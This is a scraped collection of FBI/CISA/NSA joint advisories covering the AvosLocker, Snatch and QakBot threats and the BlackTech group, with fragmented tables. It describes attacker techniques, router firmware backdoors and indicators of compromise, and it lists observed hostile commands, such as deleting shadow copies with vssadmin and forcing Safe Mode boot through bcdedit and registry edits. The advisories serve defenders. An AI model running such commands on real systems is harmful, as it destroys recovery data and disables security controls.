AvosLocker affiliates use open-source applications Lazagne and Mimikatz to steal credentials from system stores. |
Command and Control |
||
---|---|---|
Technique Title |
ID |
Use |
Protocol Tunneling |
AvosLocker affiliates use open source networking tunneling tools like Ligolo and Chisel. |
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus, strengthening the secure posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
FBI and CISA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise by AvosLocker ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
In addition, FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with AvosLocker affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.
The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.
[1] GitHub sysdream | ligolo repository
[2] GitHub jpillora | chisel repository
[3] GitHub BishopFox | sliver repository
The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC) (hereafter referred to as the “authoring agencies”) are releasing this joint cybersecurity advisory (CSA) to detail activity of the People’s Republic of China (PRC)-linked cyber actors known as BlackTech. BlackTech has demonstrated capabilities in modifying router firmware without detection and exploiting routers’ domain-trust relationships for pivoting from international subsidiaries to headquarters in Japan and the U.S. — the primary targets. The authoring agencies recommend implementing the mitigations described to detect this activity and protect devices from the backdoors the BlackTech actors are leaving behind.
BlackTech (a.k.a. Palmerworm, Temp.Overboard, Circuit Panda, and Radio Panda) actors have targeted government, industrial, technology, media, electronics, and telecommunication sectors, including entities that support the militaries of the U.S. and Japan. BlackTech actors use custom malware, dual-use tools, and living off the land tactics, such as disabling logging on routers, to conceal their operations. This CSA details BlackTech’s tactics, techniques, and procedures (TTPs), which highlights the need for multinational corporations to review all subsidiary connections, verify access, and consider implementing Zero Trust models to limit the extent of a potential BlackTech compromise.
For more information on the risks posed by this deep level of unauthorized access, see the CSA People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices.[1]
Download the PDF version of this report: PDF, 808 KB
This advisory uses the MITRE® ATT&CK® for Enterprise framework, version 13.1. See the Appendix: MITRE ATT&CK Techniques for all referenced TTPs.
Active since 2010, BlackTech actors have historically targeted a wide range of U.S. and East Asia public organizations and private industries. BlackTech actors’ TTPs include developing customized malware and tailored persistence mechanisms for compromising routers. These TTPs allow the actors to disable logging [T1562] and abuse trusted domain relationships [T1199] to pivot between international subsidiaries and domestic headquarters’ networks.
BlackTech cyber actors use custom malware payloads and remote access tools (RATs) to target victims’ operating systems. The actors have used a range of custom malware families targeting Windows®, Linux®, and FreeBSD® operating systems. Custom malware families employed by BlackTech include:
BlackTech actors continuously update these tools to evade detection [TA0005] by security software. The actors also use stolen code-signing certificates [T1588.003] to sign the malicious payloads, which make them appear legitimate and therefore more difficult for security software to detect [T1553.002].
BlackTech actors use living off the land TTPs to blend in with normal operating system and network activities, allowing them to evade detection by endpoint detection and response (EDR) products. Common methods of persistence on a host include NetCat shells, modifying the victim registry [T1112] to enable the remote desktop protocol (RDP) [T1021.001], and secure shell (SSH) [T1021.004]. The actors have also used SNScan for enumeration [TA0007], and a local file transfer protocol (FTP) server [T1071.002] to move data through the victim network. For additional examples of malicious cyber actors living off the land, see People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection.[2]
The PRC-linked BlackTech actors target international subsidiaries of U.S. and Japanese companies. After gaining access [TA0001] to the subsidiaries’ internal networks, BlackTech actors are able to pivot from the trusted internal routers to other subsidiaries of the companies and the headquarters’ networks. BlackTech actors exploit trusted network relationships between an established victim and other entities to expand their access in target networks.
Specifically, upon gaining an initial foothold into a target network and gaining administrator access to network edge devices, BlackTech cyber actors often modify the firmware to hide their activity across the edge devices to further maintain persistence in the network. To extend their foothold across an organization, BlackTech actors target branch routers—typically smaller appliances used at remote branch offices to connect to a corporate headquarters—and then abuse the trusted relationship [T1199] of the branch routers within the corporate network being targeted. BlackTech actors then use the compromised public-facing branch routers as part of their infrastructure for proxying traffic [TA0011], blending in with corporate network traffic, and pivoting to other victims on the same corporate network [T1090.002].
BlackTech has targeted and exploited various brands and versions of router devices. TTPs against routers enable the actors to conceal configuration changes, hide commands, and disable logging while BlackTech actors conduct operations. BlackTech actors have compromised several Cisco® routers using variations of a customized firmware backdoor [T1542.004]. The backdoor functionality is enabled and disabled through specially crafted TCP or UDP packets [T1205]. This TTP is not solely limited to Cisco routers, and similar techniques could be used to enable backdoors in other network equipment.
In some cases, BlackTech actors replace the firmware for certain Cisco IOS®-based routers with malicious firmware. Although BlackTech actors already had elevated privileges [TA0004] on the router to replace the firmware via command-line execution, the malicious firmware is used to establish persistent backdoor access [TA0003] and obfuscate future malicious activity. The modified firmware uses a built-in SSH backdoor [T1556.004], allowing BlackTech actors to maintain access to the compromised router without BlackTech connections being logged [T1562.003]. BlackTech actors bypass the router's built-in security features by first installing older legitimate firmware [T1601.002] that they then modify in memory to allow the installation of a modified, unsigned bootloader and modified, unsigned firmware [T1601.001]. The modified bootloader enables the modified firmware to continue evading detection [T1553.006], however, it is not always necessary.
BlackTech actors may also hide their presence and obfuscate changes made to compromised Cisco routers by hiding Embedded Event Manager (EEM) policies—a feature usually used in Cisco IOS to automate tasks that execute upon specified events—that manipulate Cisco IOS Command-Line Interface (CLI) command results. On a compromised router, the BlackTech-created EEM policy waits for specific commands to execute obfuscation measures or deny execution of specified legitimate commands. This policy has two functions: (1) to remove lines containing certain strings in the output of specified, legitimate Cisco IOS CLI commands [T1562.006], and (2) prevent the execution of other legitimate CLI commands, such as hindering forensic analysis by blocking copy, rename, and move commands for the associated EEM policy [T1562.001].
BlackTech actors utilize the following file types to compromise the router. These files are downloaded to the router via FTP or SSH.
File Type |
Description |
---|---|
Old Legitimate Firmware |
The IOS image firmware is modified in memory to allow installation of the Modified Firmware and Modified Bootloader. |
Modified Firmware |
The firmware has a built-in SSH backdoor, allowing operators to have unlogged interaction with the router. |
Modified Bootloader |
The bootloader allows Modified Firmware to continue evading the router's security features for persistence across reboots. In some cases, only modified firmware is used. |
BlackTech actors use the Cisco router's CLI to replace the router’s IOS image firmware. The process begins with the firmware being modified in memory—also called hot patching—to allow the installation of a modified bootloader and modified firmware capable of bypassing the router’s security features. Then, a specifically constructed packet triggers the router to enable the backdoor that bypasses logging and the access control list (ACL). The steps are as follows:
|
conf t |
upgrade rom file bootloader |
To allow the modified bootloader and firmware to be installed on Cisco IOS without detection, the cyber actors install an old, legitimate firmware and then modify that running firmware in memory to bypass firmware signature checks in the Cisco ROM Monitor (ROMMON) signature validation functions. The modified version’s instructions allow the actors to bypass functions of the IOS Image Load test and the Field Upgradeable ROMMON Integrity test.
BlackTech actors install modified IOS image firmware that allows backdoor access via SSH to bypass the router’s normal logging functions. The firmware consists of a Cisco IOS loader that will load an embedded IOS image.
BlackTech actors hook several functions in the embedded Cisco IOS image to jump to their own code. They overwrite existing code to handle magic packet checking, implement an SSH backdoor, and bypass logging functionality on the compromised router. The modified instructions bypass command logging, IP address ACLs, and error logging.
To enable the backdoor functions, the firmware checks for incoming trigger packets and enables or disables the backdoor functionality. When the backdoor is enabled, associated logging functions on the router are bypassed. The source IP address is stored and used to bypass ACL handling for matching packets. The SSH backdoor includes a special username that does not require additional authentication.
In order to detect and mitigate this BlackTech malicious activity, the authoring agencies strongly recommend the following detection and mitigation techniques. It would be trivial for the BlackTech actors to modify values in their backdoors that would render specific signatures of this router backdoor obsolete. For more robust detection, network defenders should monitor network devices for unauthorized downloads of bootloaders and firmware images and reboots. Network defenders should also monitor for unusual traffic destined to the router, including SSH.
The following are the best mitigation practices to defend against this type of malicious activity:
[1] Joint CSA, People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices, https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF
[2] Joint CSA, People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_PRC_State_Sponsored_Cyber_Living_off_the_Land_v1.1.PDF
[3] NSA, Network Infrastructure Security Guide, https://media.defense.gov/2022/Jun/15/2003018261/-1/-1/0/CTR_NSA_NETWORK_INFRASTRUCTURE_SECURITY_GUIDE_20220615.PDF
[4] NSA, Performing Out-of-Band Network Management, https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF
[5] Cisco, Attackers Continue to Target Legacy Devices, https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government or Japan, and this guidance shall not be used for advertising or product endorsement purposes.
Cisco and Cisco IOS are registered trademarks of Cisco Technology, Inc.
FreeBSD is a registered trademark of The FreeBSD Foundation.
Linux is a registered trademark of Linus Torvalds.
MITRE and MITRE ATT&CK are registered trademarks of The MITRE Corporation.
Windows is a registered trademark of Microsoft Corporation.
This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate cyber threats, and to develop and issue cybersecurity specifications and mitigations.
NSA Cybersecurity Report Questions and Feedback: [email protected]
NSA’s Defense Industrial Base Inquiries and Cybersecurity Services: [email protected]
NSA Media Inquiries / Press Desk: 443-634-0721, [email protected]
U.S. organizations: Report incidents and anomalous activity to CISA 24/7 Operations Center at [email protected], cisa.gov/report, or (888) 282-0870 and/or to the FBI via your local FBI field office.
See Tables 2-9 for all referenced BlackTech tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
Obtain Capabilities: Code Signing Certificates |
BlackTech actors use stolen code-signing certificates to sign payloads and evade defenses. |
Technique Title |
ID |
Use |
---|---|---|
Initial Access |
BlackTech actors gain access to victim networks by exploiting routers. |
|
Trusted Relationship |
BlackTech actors exploit trusted domain relationships of routers to gain access to victim networks. |
Technique Title |
ID |
Use |
---|---|---|
Persistence |
BlackTech actors gain persistent access to victims’ networks. |
|
Traffic Signaling |
BlackTech actors send specially crafted packets to enable or disable backdoor functionality on a compromised router. |
|
Pre-OS Boot: ROMMONkit |
BlackTech actors modify router firmware to maintain persistence. |
Technique Title |
ID |
Use |
---|---|---|
Privilege Escalation |
BlackTech actors gain elevated privileges on a victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Defense Evasion |
BlackTech actors configure their tools to evade detection by security software and EDR. |
|
Modify Registry |
BlackTech actors modify the victim’s registry. |
|
Impair Defenses |
BlackTech actors disable logging on compromised routers to avoid detection and evade defenses. |
|
Impair Defenses: Impair Command History Logging |
BlackTech actors disable logging on the compromised routers to prevent logging of any commands issued. |
|
Modify System Image: Patch System Image |
BlackTech actors modify router firmware to evade detection. |
Technique Title |
ID |
Use |
---|---|---|
Discovery |
BlackTech actors use SNScan to enumerate victims’ networks and obtain further network information. |
Technique Title |
ID |
Use |
---|---|---|
Remote Services: Remote Desktop Protocol |
BlackTech actors use RDP to move laterally across a victim’s network. |
|
Remote Services: SSH |
BlackTech actors use SSH to move laterally across a victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Command and Control |
BlackTech actors compromise and control a victim’s network infrastructure. |
|
Application Layer Protocol: File Transfer Protocols |
BlackTech actors use FTP to move data through a victim’s network or to deliver scripts for compromising routers. |
|
Proxy |
BlackTech actors use compromised routers to proxy traffic. |
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.
Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.
FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
First appearing in 2018, Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Originally, the group was referred to as Team Truniger, based on the nickname of a key group member, Truniger, who previously operated as a GandCrab affiliate. Snatch threat actors use a customized ransomware variant notable for rebooting devices into Safe Mode [T1562.009], enabling the ransomware to circumvent detection by antivirus or endpoint protection, and then encrypting files when few services are running.
Snatch threat actors have been observed purchasing previously stolen data from other ransomware variants in an attempt to further exploit victims into paying a ransom to avoid having their data released on Snatch’s extortion blog. Note: Since November 2021, an extortion site operating under the name Snatch served as a clearinghouse for data exfiltrated or stolen from victim companies on Clearnet and TOR hosted by a bulletproof hosting service. In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1]
Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network. Snatch affiliates primarily rely on exploiting weaknesses in Remote Desktop Protocol (RDP) [T1133] for brute-forcing and gaining administrator credentials to victims’ networks [T1110.001]. In some instances, Snatch affiliates have sought out compromised credentials from criminal forums/marketplaces [T1078].
Snatch threat actors gain persistence on a victim’s network by compromising an administrator account [T1078.002] and establishing connections over port 443
[T1071.001] to a command and control (C2) server located on a Russian bulletproof hosting service [T1583.003]. Per IP traffic from event logs provided by recent victims, Snatch threat actors initiated RDP connections from a Russian bulletproof hosting service and through other virtual private network (VPN) services [T1133].
Snatch threat actors were observed using different TTPs to discover data, move laterally, and search for data to exfiltrate. Snatch threat actors use sc.exe
to configure, query, stop, start, delete, and add system services using the Windows Command line. In addition to sc.exe
, Snatch threat actors also use tools such as Metasploit and Cobalt Strike [S0154].
Prior to deploying the ransomware, Snatch threat actors were observed spending up to three months on a victim’s system. Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486].
During the early stages of ransomware deployment, Snatch threat actors attempt to disable antivirus software [T1562.001] and run an executable as a file named safe.exe
or some variation thereof. In recent victims, the ransomware executable’s name consisted of a string of hexadecimal characters which match the SHA-256
hash of the file in an effort to defeat rule-based detection [T1036]. Upon initiation, the Snatch ransomware payload queries and modifies registry keys [T1012][T1112], uses various native Windows tools to enumerate the system [T1569.002], finds processes [T1057], and creates benign processes to execute Windows batch (.bat
) files [T1059.003]. In some instances, the program attempts to remove all the volume shadow copies from a system [T1490]. After the execution of the batch files, the executable removes the batch files from the victim’s filesystem [T1070.004].
The Snatch ransomware executable appends a series of hexadecimal characters to each file and folder name it encrypts—unique to each infection—and leaves behind a text file titled HOW TO RESTORE YOUR FILES.TXT
in each folder. Snatch threat actors communicate with their victims through email and the Tox communication platform based on identifiers left in ransom notes or through their extortion blog. Since November 2021, some victims reported receiving a spoofed call from an unknown female who claimed association with Snatch and directed them to the group’s extortion site. In some instances, Snatch victims had a different ransomware variant deployed on their systems, but received a ransom note from Snatch threat actors. As a result, the victims’ data is posted on the ransomware blog involving the different ransomware variant and on the Snatch threat actors’ extortion blog.
The Snatch IOCs detailed in this section were obtained through FBI investigations from September 2022 through June 2023.
Since 2019, Snatch threat actors have used numerous email addresses to email victims. Email addresses used by Snatch threat actors are random but usually originate from one of the following domains listed in Tables 1 and 2:
Email Domains |
sezname[.]cz |
cock[.]li |
airmail[.]cc |
Table 2 shows a list of legitimate email domains offering encrypted email services that have been used by Snatch threat actors. These email domains are all publicly available and legal. The use of these email domains by a threat actor should not be attributed to the email domains, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.
Email Domains |
tutanota[.]com / tutamail[.]com / tuta[.]io |
mail[.]fr |
keemail[.]me |
protonmail[.]com / proton[.]me |
swisscows[.]email |
The email addresses listed in Table 3 were reported by recent victims.
Email Addresses |
---|
TOX Messaging IDs |
---|
CAB3D74D1DADE95B52928E4D9DFC003FF5ADB2E082F59377D049A91952E8BB3B419DB2FA9D3F |
7229828E766B9058D329B2B4BC0EDDD11612CBCCFA4811532CABC76ACF703074E0D1501F8418 |
83E6E3CFEC0E4C8E7F7B6E01F6E86CF70AE8D4E75A59126A2C52FE9F568B4072CA78EF2B3C97 |
0FF26770BFAEAD95194506E6970CC1C395B04159038D785DE316F05CE6DE67324C6038727A58 NOTE: According to ransom notes, this is a “Customer service” TOX to reach out to if the original TOX ID does not respond. |
Folder Creation |
---|
C:$SysReset |
Filenames |
SHA-256 |
qesbdksdvnotrjnexutx.bat |
0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f |
eqbglqcngblqnl.bat |
1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d |
safe.exe |
5950b4e27554585123d7fca44e83169375c6001201e3bf26e57d079437e70bcd |
safe.exe |
7018240d67fd11847c7f9737eaaae45794b37a5c27ffd02beaacaf6ae13352b3 |
safe.exe |
28e82f28d0b9eb6a53d22983e21a9505ada925ebb61382fabebd76b8c4acff7c |
safe.exe |
fc31043b5f079ce88385883668eeebba76a62f77954a960fb03bf46f47dbb066 |
DefenderControl.exe |
a201f7f81277e28c0bdd680427b979aee70e42e8a98c67f11e7c83d02f8fe7ae |
PRETTYOCEANApplicationdrs.bi |
6992aaad3c47b938309fc1e6f37179eb51f028536f8afc02e4986312e29220c0 |
Setup.exe |
510e9fa38a08d446189c34fe6125295f410b36f00aceb65e7b4508e9d7c4e1d1 |
WRSA.exe |
ed0fd61bf82660a69f5bfe0e66457cfe56d66dd2b310e9e97657c37779aef65d |
ghnhfglwaplf.bat |
2155a029a024a2ffa4eff9108ac15c7db527ca1c8f89ccfd94cc3a70b77cfc57 |
nllraq.bat |
251427c578eaa814f07037fbe6e388b3bc86ed3800d7887c9d24e7b94176e30d |
ygariiwfenmqteiwcr.bat |
3295f5029f9c9549a584fa13bc6c25520b4ff9a4b2feb1d9e935cc9e4e0f0924 |
bsfyqgqeauegwyfvtp.bat |
6c9d8c577dddf9cc480f330617e263a6ee4461651b4dec1f7215bda77df911e7 |
rgibdcghzwpk.bat |
84e1476c6b21531de62bbac67e52ab2ac14aa7a30f504ecf33e6b62aa33d1fe5 |
pxyicmajjlqrtgcnhi.bat |
a80c7fe1f88cf24ad4c55910a9f2189f1eedad25d7d0fd53dbfe6bdd68912a84 |
evhgpp.bat |
b998a8c15cc19c8c31c89b30f692a40b14d7a6c09233eb976c07f19a84eccb40 |
eqbglqcngblqnl.bat |
1fbdb97893d09d59575c3ef95df3c929fe6b6ddf1b273283e4efadf94cdc802d |
qesbdksdvnotrjnexutx.bat |
0965cb8ee38adedd9ba06bdad9220a35890c2df0e4c78d0559cd6da653bf740f |
HOW TO RESTORE YOUR FILES.TXT |
|
Filenames |
SHA-1 |
safe.exe |
c8a0060290715f266c89a21480fed08133ea2614 |
Commands |
wmiadap.exe /F /T /R |
%windir%System32svchost.eve –k WerSvcGroup |
conhost.exe 0xFFFFFFFF -ForceV1 |
vssadmin delete shadows /all /quiet |
bcdedit.exe /set {current} safeboot minimal |
REG ADD HKLMSYSTEMCurrentControlSetControlSafeBootMinimalVSS /VE /T REG_SZ /F /D Service |
REG ADD HKLMSYSTEMCurrentControlSetControlSafeBootMinimalmXoRpcSsx /VE /T REG_SZ /F /D Service |
REG QUERY HKLMSYSTEMCurrentControlSetControl /v SystemStartOptions |
%CONHOST% "1088015358-1778111623-1306428145949291561678876491840500802412316031-33820320 |
"C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe" --flag-switches-begin --flag-switches-end --no-startup-window /prefetch:5 |
cmd /d /c cmd /d /c cmd /d /c start " " C:Usersgrade1AppDataLocalPRETTYOCEANluvApplicationPRETTYOCEANApplicationidf.bi. |
Registry Keys |
---|
HKLMSOFTWAREMicrosoftWindows Media Player NSS3.0ServersD8B548F0-E306-4B2B-BD82-25DAC3208786FriendlyName |
HKUS-1-5-21-4270068108-2931534202-3907561125-1001SoftwareMicrosoftWindowsCurrentVersionShell ExtensionsCached{ED50FC29-B964- |
Source |
Message |
TerminalServices-RemoteConnectionManager |
Remote session from client name exceeded the maximum allowed failed logon attempts. The session was forcibly terminated. |
Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall |
A rule was added (Event 2004) or modified (Event 2005) in the Windows Defender Firewall exception list. All rules included action “Allow” and rule name included “File and Printer Sharing” |
Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall |
A Windows Defender Firewall setting was changed in private, public, and domain profile with type “Enable Windows Defender Firewall” and value of “no”. |
Microsoft-Windows-TaskScheduler%4Operational |
Instance of process C:Windowssvchost.exe. (Incorrect file location, should be C:WindowsSystem32svchost.exe) |
Mutexes Created |
---|
Sessions1BaseNamedObjectsgcc-shmem-tdm2-fc_key |
Sessions1BaseNamedObjectsgcc-shmem-tdm2-sjlj_once |
Sessions1BaseNamedObjectsgcc-shmem-tdm2-use_fc_key |
gcc-shmem-tdm2-fc_key |
gcc-hmem-tdm2-sjlj_once |
gcc-shmem-tdm2-use_fc_key |
See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
Gather Victim Network Information |
Snatch threat actors may gather information about the victim's networks that can be used during targeting. |
Technique Title |
ID |
Use |
Acquire Infrastructure: Virtual Private Server |
Snatch threat actors may rent Virtual Private Servers (VPSs) that can be used during targeting. Snatch threat actors acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure. |
Technique Title |
ID |
Use |
Valid Accounts |
Snatch threat actors use compromised user credentials from criminal forums/marketplaces to gain access and maintain persistence on a victim’s network. |
|
External Remote Services |
Snatch threat actors exploit weaknesses in RDP to perform brute forcing and gain administrator credentials for a victim’s network. Snatch threat actors use VPN services to connect to a victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Command and Scripting Interpreter: Windows Command Shell |
Snatch threat actors may use batch files ( |
|
System Services: Service Execution |
Snatch threat actors may leverage various Windows tools to enumerate systems on the victim’s network. Snatch ransomware used |
Technique Title |
ID |
Use |
---|---|---|
Valid Accounts: Domain Accounts |
Snatch threat actors compromise domain accounts to maintain persistence on a victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Masquerading |
Snatch threat actors have the ransomware executable match the |
|
Indicator Removal: File Deletion |
Snatch threat actors delete batch files from a victim’s filesystem once execution is complete. |
|
Modify Registry |
Snatch threat actors modify Windows Registry keys to aid in persistence and execution. |
|
Impair Defenses: Disable or Modify Tools |
Snatch threat actors have attempted to disable a system’s antivirus program to enable persistence and ransomware execution. |
|
Impair Defenses: Safe Mode Boot |
Snatch threat actors abuse Windows Safe Mode to circumvent detection by antivirus or endpoint protection and encrypt files when few services are running. |
Technique Title |
ID |
Use |
---|---|---|
Brute Force: Password Guessing |
Snatch threat actors use brute force to obtain administrator credentials for a victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Query Registry |
Snatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software. |
|
Process Discovery |
Snatch threat actors search for information about running processes on a system. |
Technique Title |
ID |
Use |
---|---|---|
Remote Services: Remote Desktop Protocol |
Snatch threat actors may use Valid Accounts to log into a computer using the Remote Desktop Protocol. |
Technique Title |
ID |
Use |
---|---|---|
Data from Local System |
Snatch threat actors search systems to find files and folders of interest prior to exfiltration. |
Technique Title |
ID |
Use |
---|---|---|
Application Layer Protocols: Web Protocols |
Snatch threat actors establish connections over port |
Technique Title |
ID |
Use |
---|---|---|
Exfiltration |
Snatch threat actors use exfiltration techniques to steal data from a victim’s network. |
Technique Title |
ID |
Use |
Data Encrypted for Impact |
Snatch threat actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. |
|
Inhibit System Recovery |
Snatch threat actors delete all volume shadow copies from a victim’s filesystem to inhibit system recovery. |
These mitigations apply to all stakeholders. The authoring agencies recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices for hardening software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and file encryption), thus strengthening the secure posture for their customers. For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide. |
The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Snatch threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at [email protected] or (888) 282-0870.
[1] DataBreaches.net
The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.
September 20, 2023: Initial version.
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) to disseminate QakBot infrastructure indicators of compromise (IOCs) identified through FBI investigations as of August 2023. On August 25, FBI and international partners executed a coordinated operation to disrupt QakBot infrastructure worldwide. Disruption operations targeting QakBot infrastructure resulted in the botnet takeover, which severed the connection between victim computers and QakBot command and control (C2) servers. The FBI is working closely with industry partners to share information about the malware to maximize detection, remediation, and prevention measures for network defenders.
